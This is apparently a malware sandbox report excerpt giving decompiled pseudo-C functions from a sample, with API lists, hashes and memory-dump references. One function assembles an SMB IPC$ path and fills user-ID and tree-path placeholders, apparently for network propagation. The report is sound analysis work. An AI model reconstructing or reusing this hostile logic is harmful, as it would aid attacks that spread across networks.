            • Associated: 00000001.00000002.265685545.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265724046.0000000000710000.00000002.00000001.01000000.00000005.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_THN6clTA6P.jbxd
            Yara matches
            Similarity
            • API ID: CloseHandle_beginthreadex$SleepStartup
            • String ID:
            • API String ID: 3130858798-0
            • Opcode ID: 8471eb59b16b45d4dfa7dbc743e05df102ba74d9057e29b34b6237baa2c8aec5
            • Instruction ID: 1e4fdecbfe57a610b0f06217e02aa33bd8da907f4b09002892e0f7dc0aa358b4
            • Opcode Fuzzy Hash: 8471eb59b16b45d4dfa7dbc743e05df102ba74d9057e29b34b6237baa2c8aec5
            • Instruction Fuzzy Hash: D3F05E31B8831432F52026AA5E4BF5BB65C8F45B99F624032FB04FA1C1E9B9F81145EE
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00408E50 Relevance: 6.2, APIs: 4, Instructions: 180COMMON
            Download Yara Rule
            C-Code - Quality: 95%
            			E00408E50(signed int _a4, signed int _a8) {
				signed int _v0;
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v40;
				signed int _v52;
				signed int _t47;
				signed int _t49;
				signed int _t50;
				void* _t52;
				signed int _t57;
				signed int _t58;
				signed int _t59;
				intOrPtr _t66;
				signed int _t68;
				signed int _t69;
				signed int _t77;
				signed int _t78;
				signed int _t87;
				intOrPtr _t101;
				intOrPtr _t105;
				intOrPtr _t108;
				signed int* _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				signed int* _t116;
				signed int* _t117;

				_t116 =  &_v8;
				_t47 = _a8;
				_push(_t47);
				L004097F8();
				_t112 = _t47;
				_push(_a8);
				L004097F8();
				_t114 = _t47;
				_t68 = _t112;
				_v12 = _t114;
				_a4 = _t68;
				if(_t112 <= _t114) {
					_t113 = _v4;
					do {
						_t49 = _t68 & 0x000000ff;
						if(_t49 != 0 && _t49 != 0xff) {
							_push(_t68);
							L004097F2();
							_v4 = _t49;
							_t50 =  *(_t113 + 8);
							_t111 = _t50;
							if( *((intOrPtr*)(_t113 + 0xc)) - _t50 >> 2 >= 1) {
								if(_t50 - _t111 >> 2 >= 1) {
									_v0 = _t50 - 4;
									E00409050(_t50 - 4, _t50, _t50);
									_t77 =  *(_t113 + 8);
									_t52 = _t77 - 4;
									if(_t111 == _t52) {
										L25:
										_t49 =  &(_t111[1]);
										if(_t111 == _t49) {
											L27:
											 *(_t113 + 8) =  *(_t113 + 8) + 4;
											goto L28;
										} else {
											goto L26;
										}
										do {
											L26:
											 *_t111 = _v4;
											_t111 =  &(_t111[1]);
										} while (_t111 != _t49);
										goto L27;
									} else {
										goto L24;
									}
									do {
										L24:
										_t101 =  *((intOrPtr*)(_t52 - 4));
										_t52 = _t52 - 4;
										_t77 = _t77 - 4;
										 *_t77 = _t101;
									} while (_t52 != _t111);
									goto L25;
								}
								E00409050(_t111, _t50,  &(_t111[1]));
								E00409080( *(_t113 + 8), 1 - ( *(_t113 + 8) - _t111 >> 2),  &_v16);
								_t49 =  *(_t113 + 8);
								if(_t111 == _t49) {
									goto L27;
								} else {
									goto L21;
								}
								do {
									L21:
									 *_t111 = _v4;
									_t111 =  &(_t111[1]);
								} while (_t111 != _t49);
								goto L27;
							}
							_t105 =  *((intOrPtr*)(_t113 + 4));
							if(_t105 == 0) {
								L7:
								_t78 = 1;
								L8:
								if(_t105 != 0) {
									_t57 = _t50 - _t105 >> 2;
								} else {
									_t57 = 0;
								}
								_t58 = _t57 + _t78;
								_v20 = _t58;
								if(_t58 < 0) {
									_t58 = 0;
								}
								_t59 = _t58 << 2;
								_push(_t59);
								L00409A10();
								_t115 =  *((intOrPtr*)(_t113 + 4));
								_t117 =  &(_t116[1]);
								_v8 = _t59;
								_t69 = _t59;
								if( *((intOrPtr*)(_t113 + 4)) == _t111) {
									L15:
									E00409080(_t69, 1,  &_v4);
									E00409050(_t111,  *(_t113 + 8), _t69 + 4);
									E004097FE(E00409040( *(_t113 + 8),  *((intOrPtr*)(_t113 + 4)),  *(_t113 + 8)),  *((intOrPtr*)(_t113 + 4)));
									_t108 = _v40;
									_t116 =  &(_t117[1]);
									_t66 =  *((intOrPtr*)(_t113 + 4));
									 *((intOrPtr*)(_t113 + 0xc)) = _t108 + _v52 * 4;
									if(_t66 != 0) {
										_t87 =  *(_t113 + 8) - _t66 >> 2;
									} else {
										_t87 = 0;
									}
									_t114 = _v16;
									_t68 = _v0;
									_t49 = _t108 + 4 + _t87 * 4;
									 *((intOrPtr*)(_t113 + 4)) = _t108;
									 *(_t113 + 8) = _t49;
									goto L28;
								} else {
									do {
										E004090B0(_t69, _t115);
										_t115 =  &_a4;
										_t117 =  &(_t117[2]);
										_t69 = _t69 + 4;
									} while ( &_a4 != _t111);
									goto L15;
								}
							}
							_t78 = _t50 - _t105 >> 2;
							if(_t78 > 1) {
								goto L8;
							}
							goto L7;
						}
						L28:
						_t68 = _t68 + 1;
						_a4 = _t68;
					} while (_t68 <= _t114);
					return _t49;
				}
				return _t47;
			}

































            0x00408e50
            0x00408e53
            0x00408e5a
            0x00408e5b
            0x00408e64
            0x00408e66
            0x00408e67
            0x00408e6c
            0x00408e6e
            0x00408e72
            0x00408e76
            0x00408e7a
            0x00408e80
            0x00408e85
            0x00408e87
            0x00408e8c
            0x00408e9d
            0x00408e9e
            0x00408ea6
            0x00408eaa
            0x00408eaf
            0x00408eb7
            0x00408f97
            0x00408fe0
            0x00408fe7
            0x00408fec
            0x00408fef
            0x00408ff4
            0x00409005
            0x00409005
            0x0040900a
            0x00409019
            0x00409019
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x0040900c
            0x0040900c
            0x00409010
            0x00409012
            0x00409015
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00408ff6
            0x00408ff6
            0x00408ff6
            0x00408ff9
            0x00408ffc
            0x00409001
            0x00409001
            0x00000000
            0x00408ff6
            0x00408fa1
            0x00408fc0
            0x00408fc5
            0x00408fca
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00408fcc
            0x00408fcc
            0x00408fd0
            0x00408fd2
            0x00408fd5
            0x00000000
            0x00408fd9
            0x00408ebd
            0x00408ec2
            0x00408ed0
            0x00408ed0
            0x00408ed5
            0x00408ed7
            0x00408edf
            0x00408ed9
            0x00408ed9
            0x00408ed9
            0x00408ee2
            0x00408ee6
            0x00408eea
            0x00408eec
            0x00408eec
            0x00408eee
            0x00408ef1
            0x00408ef2
            0x00408ef7
            0x00408efa
            0x00408eff
            0x00408f03
            0x00408f05
            0x00408f1b
            0x00408f25
            0x00408f35
            0x00408f4d
            0x00408f52
            0x00408f5a
            0x00408f60
            0x00408f65
            0x00408f68
            0x00408f73
            0x00408f6a
            0x00408f6a
            0x00408f6a
            0x00408f76
            0x00408f7a
            0x00408f7e
            0x00408f82
            0x00408f85
            0x00000000
            0x00408f07
            0x00408f07
            0x00408f09
            0x00408f0e
            0x00408f11
            0x00408f14
            0x00408f17
            0x00000000
            0x00408f07
            0x00408f05
            0x00408ec8
            0x00408ece
            0x00000000
            0x00000000
            0x00000000
            0x00408ece
            0x0040901d
            0x0040901d
            0x00409020
            0x00409020
            0x00000000
            0x0040902a
            0x00409031

            APIs
            Memory Dump Source
            • Source File: 00000001.00000002.265562252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.265557684.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265568782.000000000040A000.00000002.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265593246.000000000040B000.00000008.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265600976.000000000040F000.00000008.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265685545.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265724046.0000000000710000.00000002.00000001.01000000.00000005.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_THN6clTA6P.jbxd
            Yara matches
            Similarity
            • API ID: htonl$??2@
            • String ID:
            • API String ID: 152249050-0
            • Opcode ID: cdadf52d50e63ee07c61cf5d9a4cec218a0c917f41930d2db30c28799ec4f575
            • Instruction ID: 68712c36a765c29567f29fdacebd61dff63a75ad1a406e37439d481e42e01933
            • Opcode Fuzzy Hash: cdadf52d50e63ee07c61cf5d9a4cec218a0c917f41930d2db30c28799ec4f575
            • Instruction Fuzzy Hash: 3B5195712007028BD724DE29C99193FB3E6EBC4308B14493EE59BE7781EA39ED058B55
            Uniqueness

            Uniqueness Score: -1.00%

            Function 004017B0 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 155COMMON
            Download Yara Rule
            C-Code - Quality: 81%
            			E004017B0(void* __eflags) {
				intOrPtr _t39;
				intOrPtr _t41;
				void* _t57;
				char* _t68;
				signed int _t74;
				signed int _t80;
				signed int _t92;
				signed int _t93;
				signed int _t102;
				signed int _t107;
				signed int _t115;
				signed int _t116;
				unsigned int _t124;
				unsigned int _t127;
				void* _t163;
				void* _t164;
				void* _t169;
				void* _t172;
				unsigned int _t174;
				void* _t176;
				void* _t177;
				void* _t178;
				void* _t179;
				void* _t181;
				void* _t183;
				void* _t187;

				 *((char*)(_t176 + 0x18)) = 0;
				memset(_t176 + 0x19, 0, 0x31 << 2);
				_t177 = _t176 + 0xc;
				asm("stosw");
				asm("stosb");
				_t68 = _t177 + 0x18;
				_t62 = 0x5f;
				sprintf(_t68, "\\\\%s\\IPC$",  *((intOrPtr*)(_t177 + 0x4e4)));
				asm("repne scasb");
				_t71 =  !(_t68 | 0xffffffff) - 1;
				_t174 =  !(_t68 | 0xffffffff) - 1 + 1;
				_t39 = E00401140( !(_t68 | 0xffffffff) - 1, 0x42e494, "__USERID__PLACEHOLDER__", 0x5f);
				_t178 = _t177 + 0x18;
				 *((intOrPtr*)(_t178 + 0x10)) = _t39;
				if(_t39 != 0) {
					_t127 = _t39 - 0x42e494;
					_t102 = _t127 >> 2;
					_t57 = memcpy(0x42e494 + _t102 + _t102, 0x42e494, memcpy(_t178 + 0xe0, 0x42e494, _t102 << 2) & 0x00000003);
					_t187 = _t178 + 0x18;
					_t107 =  *_t57;
					 *(_t187 + _t127 + 0xe0) = _t107;
					 *((char*)(_t187 + _t127 + 0xe1)) =  *((intOrPtr*)(_t57 + 1));
					asm("repne scasb");
					asm("repne scasb");
					_t172 =  !( !(_t107 | 0xffffffff) - 0x00000001 | 0xffffffff) - 1 +  *((intOrPtr*)(_t187 + 0x10));
					_t115 = 0x5f - _t127;
					_t116 = _t115 >> 2;
					memcpy(_t187 + _t127 + 0xe2, _t172, _t116 << 2);
					memcpy(_t172 + _t116 + _t116, _t172, _t115 & 0x00000003);
					_t178 = _t187 + 0x18;
					asm("repne scasb");
					_t71 = 0xbadbac;
					_t62 = 0x61;
				}
				_t41 = E00401140(_t71, _t178 + 0xe4, "__TREEPATH_REPLACE__", _t62);
				_t179 = _t178 + 0xc;
				 *((intOrPtr*)(_t179 + 0x10)) = _t41;
				if(_t41 != 0) {
					_t124 = _t41 - _t179 + 0xe0;
					_t163 = _t179 + 0xe0;
					_t74 = _t124 >> 2;
					memcpy(_t163 + _t74 + _t74, _t163, memcpy(0x42e494, _t163, _t74 << 2) & 0x00000003);
					_t181 = _t179 + 0x18;
					_t164 = _t181 + 0x18;
					_t26 = 0x42e494 + _t124; // 0x42e494
					_t80 = _t174 >> 2;
					memcpy(_t164 + _t80 + _t80, _t164, memcpy(_t26, _t164, _t80 << 2) & 0x00000003);
					_t183 = _t181 + 0x18;
					asm("repne scasb");
					asm("repne scasb");
					 *(_t183 + 0x14) = _t62 - _t124;
					_t169 = 0xbadbac +  *((intOrPtr*)(_t183 + 0x10));
					_t92 =  *(_t183 + 0x14);
					_t32 = 0x42e494 + _t174; // 0x42e494
					_t93 = _t92 >> 2;
					memcpy(_t124 + _t32, _t169, _t93 << 2);
					memcpy(_t169 + _t93 + _t93, _t169, _t92 & 0x00000003);
					asm("repne scasb");
					_t62 = _t62 + _t174 - 0xbadbac;
				}
				 *0x42e497 = _t62 - 4;
				return _t62;
			}





























            0x004017c5
            0x004017ca
            0x004017ca
            0x004017cc
            0x004017ce
            0x004017d6
            0x004017e1
            0x004017e6
            0x004017f6
            0x004017fa
            0x00401807
            0x00401808
            0x0040180d
            0x00401810
            0x00401816
            0x00401823
            0x00401836
            0x00401847
            0x00401847
            0x00401849
            0x0040184e
            0x00401855
            0x00401866
            0x00401875
            0x00401887
            0x00401889
            0x00401892
            0x00401895
            0x0040189c
            0x0040189c
            0x004018a6
            0x004018aa
            0x004018ab
            0x004018ab
            0x004018bb
            0x004018c0
            0x004018c3
            0x004018c9
            0x004018d8
            0x004018da
            0x004018ea
            0x004018f4
            0x004018f4
            0x004018f8
            0x004018fe
            0x00401904
            0x00401910
            0x00401910
            0x0040191a
            0x0040192d
            0x00401932
            0x0040193c
            0x0040193e
            0x00401942
            0x0040194b
            0x0040194e
            0x00401955
            0x0040195f
            0x00401966
            0x00401966
            0x0040196e
            0x0040197d

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.265562252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.265557684.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265568782.000000000040A000.00000002.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265593246.000000000040B000.00000008.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265600976.000000000040F000.00000008.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265685545.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265724046.0000000000710000.00000002.00000001.01000000.00000005.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_THN6clTA6P.jbxd
            Yara matches
            Similarity
            • API ID: sprintf
            • String ID: \\%s\IPC$$__TREEPATH_REPLACE__$__USERID__PLACEHOLDER__
            • API String ID: 590974362-3739929053
            • Opcode ID: 8a71566191ccf39690d414baa018c0f0f4a24144a8cbb20510a2571041c156f4
            • Instruction ID: 87eaab73753a0df69db57b4304ef99bcc9305a721015e4a4d2ea0bcfc63ae1aa
            • Opcode Fuzzy Hash: 8a71566191ccf39690d414baa018c0f0f4a24144a8cbb20510a2571041c156f4
            • Instruction Fuzzy Hash: EB41D7327046450BC71CD93898516AF7AC2B7C8360F944B3EB95BF36D2DEE89D09C289
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00408200 Relevance: 6.1, APIs: 4, Instructions: 56COMMON
            Download Yara Rule
            C-Code - Quality: 46%
            			E00408200(char* __ecx, intOrPtr* _a4, intOrPtr* _a8) {
				intOrPtr* _t17;
				void* _t29;
				intOrPtr* _t30;
				char* _t33;
				intOrPtr* _t34;
				void* _t35;
				void* _t36;

				_t33 = __ecx;
				 *__ecx =  *_a8;
				_t17 =  *_a4;
				 *((char*)(__ecx + 1)) = _t17;
				 *((char*)(__ecx + 8)) = 0;
				L00409A10();
				_t30 = _t17;
				_t36 = _t35 + 4;
				_t34 = _t30;
				 *((intOrPtr*)(_t30 + 4)) = 0;
				 *((intOrPtr*)(_t30 + 0x14)) = 1;
				__imp__??0_Lockit@std@@QAE@XZ(0x18, _t29);
				if( *0x70f878 == 0) {
					 *0x70f878 = _t30;
					 *_t30 = 0;
					_t34 = 0;
					 *((intOrPtr*)( *0x70f878 + 8)) = 0;
				}
				 *0x70f874 =  *0x70f874 + 1;
				__imp__??1_Lockit@std@@QAE@XZ();
				if(_t34 != 0) {
					_t17 = E004097FE(_t17, _t34);
					_t36 = _t36 + 4;
				}
				_push(0x18);
				L00409A10();
				 *((intOrPtr*)(_t17 + 4)) =  *0x70f878;
				 *((intOrPtr*)(_t17 + 0x14)) = 0;
				 *((intOrPtr*)(_t33 + 4)) = _t17;
				 *((intOrPtr*)(_t33 + 0xc)) = 0;
				 *_t17 = _t17;
				_t14 = _t33 + 4; // 0x0
				 *((intOrPtr*)( *_t14 + 8)) =  *_t14;
				return _t33;
			}










            0x0040820b
            0x00408210
            0x00408212
            0x00408218
            0x0040821b
            0x0040821e
            0x00408223
            0x00408225
            0x0040822c
            0x0040822e
            0x00408231
            0x00408238
            0x00408244
            0x00408246
            0x0040824c
            0x00408254
            0x00408256
            0x00408256
            0x00408260
            0x0040826a
            0x00408272
            0x00408275
            0x0040827a
            0x0040827a
            0x00408283
            0x00408285
            0x0040828a
            0x0040828d
            0x00408290
            0x00408293
            0x00408296
            0x00408298
            0x0040829e
            0x004082a7

            APIs
            • ??2@YAPAXI@Z.MSVCRT ref: 0040821E
            • ??0_Lockit@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00401005), ref: 00408238
            • ??1_Lockit@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00401005), ref: 0040826A
            • ??2@YAPAXI@Z.MSVCRT ref: 00408285
            Memory Dump Source
            • Source File: 00000001.00000002.265562252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.265557684.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265568782.000000000040A000.00000002.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265593246.000000000040B000.00000008.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265600976.000000000040F000.00000008.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265685545.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265724046.0000000000710000.00000002.00000001.01000000.00000005.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_THN6clTA6P.jbxd
            Yara matches
            Similarity
            • API ID: ??2@Lockit@std@@$??0_??1_
            • String ID:
            • API String ID: 1660098694-0
            • Opcode ID: 9565fa150f8d55eb40344cda65b16be015eeb019920554359c80d150c1b404bb
            • Instruction ID: ed6257cba21c300c3bd1b00d2b9572d6b1f2bc40cebacaef3d4e525a17ff9f7a
            • Opcode Fuzzy Hash: 9565fa150f8d55eb40344cda65b16be015eeb019920554359c80d150c1b404bb
            • Instruction Fuzzy Hash: FB1190B1504345CFC310DF69E984A82FBE4EF94300B14C47EE189977A2DB75E888CB96
            Uniqueness

            Uniqueness Score: -1.00%

            Function 004090D0 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
            Download Yara Rule
            C-Code - Quality: 68%
            			E004090D0(void* __eax, intOrPtr _a4) {
				intOrPtr _v0;
				intOrPtr _t5;
				intOrPtr _t10;

				_t10 = _a4;
				_push(_t10);
				L004097F8();
				_t5 = _a4;
				_push(_t5);
				L004097F8();
				if(_t5 > __eax) {
					L3:
					return 0;
				} else {
					_push(_t10);
					L004097F8();
					_push(_v0);
					L004097F8();
					if(_t5 > _t5) {
						goto L3;
					} else {
						return 1;
					}
				}
			}






            0x004090d1
            0x004090d6
            0x004090d7
            0x004090de
            0x004090e2
            0x004090e3
            0x004090ea
            0x0040910b
            0x0040910e
            0x004090ec
            0x004090ec
            0x004090ed
            0x004090f8
            0x004090f9
            0x00409100
            0x00000000
            0x00409103
            0x00409109
            0x00409109
            0x00409100

            APIs
            Memory Dump Source
            • Source File: 00000001.00000002.265562252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.265557684.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265568782.000000000040A000.00000002.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265593246.000000000040B000.00000008.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265600976.000000000040F000.00000008.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265685545.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265724046.0000000000710000.00000002.00000001.01000000.00000005.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_THN6clTA6P.jbxd
            Yara matches
            Similarity
            • API ID: htonl
            • String ID:
            • API String ID: 2009864989-0
            • Opcode ID: 974404ef13c792f6d60e4639a8e2796aadad80cb73d53d8352a315d354e0b97a
            • Instruction ID: b9a91dcc1a6b66c5179df083d6ddaca1aa23fca62ef21b8c4899d7e242e77a13
            • Opcode Fuzzy Hash: 974404ef13c792f6d60e4639a8e2796aadad80cb73d53d8352a315d354e0b97a
            • Instruction Fuzzy Hash: 45E0483361426156D720FF2DA8948CF92C89FC53A0B05053BF411F7242D578DC41526B
            Uniqueness

            Uniqueness Score: -1.00%